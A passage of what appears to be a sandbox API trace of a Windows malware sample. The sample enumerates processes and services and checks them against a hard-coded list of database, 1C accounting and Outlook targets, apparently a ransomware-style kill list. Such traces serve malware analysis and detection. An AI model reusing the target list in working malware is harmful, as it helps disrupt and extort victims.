szExeFile="System")) returned 1 [0259.936] lstrlenW (lpString="System") returned 6 [0259.936] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0259.936] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0259.936] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0259.937] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0259.937] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0259.937] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0259.937] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0259.937] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0259.937] lstrlenW (lpString="smss.exe") returned 8 [0259.937] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0259.937] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0259.937] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0259.937] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0259.937] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0259.937] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0259.937] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0259.937] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0259.937] lstrlenW (lpString="csrss.exe") returned 9 [0259.937] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0259.937] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0259.937] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0259.937] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0259.937] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0259.938] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0259.938] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0259.938] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0259.938] lstrlenW (lpString="wininit.exe") returned 11 [0259.938] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0259.938] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0259.938] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0259.938] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0259.938] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0259.938] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0259.938] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0259.938] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x18c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0259.938] lstrlenW (lpString="csrss.exe") returned 9 [0259.938] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0259.938] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0259.938] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0259.938] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0259.938] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0259.938] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0259.938] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0259.939] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0259.939] lstrlenW (lpString="winlogon.exe") returned 12 [0259.939] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0259.939] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0259.939] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0259.939] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0259.939] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0259.939] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0259.939] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0259.939] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0259.939] lstrlenW (lpString="services.exe") returned 12 [0259.939] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0259.939] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0259.939] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0259.939] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0259.939] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0259.939] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0259.939] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0259.939] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x180, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0259.940] lstrlenW (lpString="lsass.exe") returned 9 [0259.940] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0259.940] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0259.940] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0259.940] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0259.940] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0259.940] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0259.940] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0259.940] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0259.940] lstrlenW (lpString="lsm.exe") returned 7 [0259.940] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0259.940] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0259.940] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0259.940] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0259.940] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0259.940] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0259.940] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0259.940] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.941] lstrlenW (lpString="svchost.exe") returned 11 [0259.941] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0259.941] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0259.941] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0259.941] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0259.941] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0259.941] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0259.941] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0259.941] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.941] lstrlenW (lpString="svchost.exe") returned 11 [0259.941] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0259.941] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0259.941] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0259.941] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0259.941] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0259.941] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0259.941] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0259.941] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.942] lstrlenW (lpString="svchost.exe") returned 11 [0259.942] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0259.942] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0259.942] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0259.942] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0259.942] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0259.942] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0259.942] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0259.942] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x340, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.942] lstrlenW (lpString="svchost.exe") returned 11 [0259.942] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.942] lstrlenW (lpString="svchost.exe") returned 11 [0259.942] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0259.943] lstrlenW (lpString="audiodg.exe") returned 11 [0259.943] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.943] lstrlenW (lpString="svchost.exe") returned 11 [0259.943] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.943] lstrlenW (lpString="svchost.exe") returned 11 [0259.943] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0259.944] lstrlenW (lpString="userinit.exe") returned 12 [0259.944] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x340, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0259.944] lstrlenW (lpString="dwm.exe") returned 7 [0259.944] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x448, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0259.944] lstrlenW (lpString="explorer.exe") returned 12 [0259.944] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0259.945] lstrlenW (lpString="spoolsv.exe") returned 11 [0259.945] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0259.945] lstrlenW (lpString="taskhost.exe") returned 12 [0259.945] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.945] lstrlenW (lpString="svchost.exe") returned 11 [0259.945] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="MicosoftSearch.exe")) returned 1 [0259.945] lstrlenW (lpString="MicosoftSearch.exe") returned 18 [0259.945] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x54c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0259.946] lstrlenW (lpString="reader_sl.exe") returned 13 [0259.946] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x54c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 0 [0259.946] CloseHandle (hObject=0x380) returned 1 [0259.946] Sleep (dwMilliseconds=0x1f4) [0260.637] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x47ea4c0 [0260.638] EnumServicesStatusExW (in: hSCManager=0x47ea4c0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 0 [0260.638] GetLastError () returned 0xea [0260.638] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xd68) returned 0x3dec5a0 [0260.638] EnumServicesStatusExW (in: hSCManager=0x47ea4c0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3dec5a0, cbBufSize=0xd68, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3dec5a0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 1 [0260.639] CloseServiceHandle (hSCObject=0x47ea4c0) returned 1 [0260.639] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0260.639] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0260.639] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0260.639] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0260.639] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0260.639] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0260.639] lstrlenW (lpString="AudioSrv") returned 8 [0260.639] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0260.639] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0260.639] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0260.639] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0260.639] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0260.639] lstrlenW (lpString="BFE") returned 3 [0260.639] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0260.639] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0260.639] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0260.639] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0260.639] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0260.639] lstrlenW (lpString="CryptSvc") returned 8 [0260.639] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0260.639] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0260.639] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0260.639] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0260.639] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0260.640] lstrlenW (lpString="CscService") returned 10 [0260.640] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0260.640] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0260.640] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0260.640] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0260.640] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0260.640] lstrlenW (lpString="DcomLaunch") returned 10 [0260.640] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0260.640] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0260.640] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0260.640] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0260.640] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0260.640] lstrlenW (lpString="Dhcp") returned 4 [0260.640] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0260.640] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0260.640] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0260.640] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0260.640] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0260.640] lstrlenW (lpString="Dnscache") returned 8 [0260.640] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0260.640] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0260.640] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0260.640] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0260.640] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0260.640] lstrlenW (lpString="DPS") returned 3 [0260.640] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0260.640] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0260.640] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0260.640] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0260.640] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0260.640] lstrlenW (lpString="eventlog") returned 8 [0260.640] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0260.640] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0260.640] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0260.641] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0260.641] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0260.641] lstrlenW (lpString="EventSystem") returned 11 [0260.641] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0260.641] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0260.641] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0260.641] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0260.641] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0260.641] lstrlenW (lpString="gpsvc") returned 5 [0260.641] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0260.641] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0260.641] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0260.641] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0260.641] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0260.641] lstrlenW (lpString="LanmanWorkstation") returned 17 [0260.641] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0260.641] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0260.641] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0260.641] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0260.641] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0260.641] lstrlenW (lpString="lmhosts") returned 7 [0260.641] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0260.641] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0260.641] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0260.641] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0260.641] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0260.641] lstrlenW (lpString="MMCSS") returned 5 [0260.641] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0260.641] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0260.641] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0260.641] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0260.641] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0260.641] lstrlenW (lpString="MpsSvc") returned 6 [0260.641] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0260.642] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0260.642] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0260.642] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0260.642] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0260.642] lstrlenW (lpString="NlaSvc") returned 6 [0260.642] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0260.642] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0260.642] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0260.642] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0260.642] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0260.642] lstrlenW (lpString="nsi") returned 3 [0260.642] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0260.642] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0260.642] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0260.642] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0260.642] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0260.642] lstrlenW (lpString="PcaSvc") returned 6 [0260.642] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0260.642] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0260.642] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0260.642] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0260.642] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0260.642] lstrlenW (lpString="PlugPlay") returned 8 [0260.642] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0260.642] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0260.642] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0260.642] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0260.642] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0260.642] lstrlenW 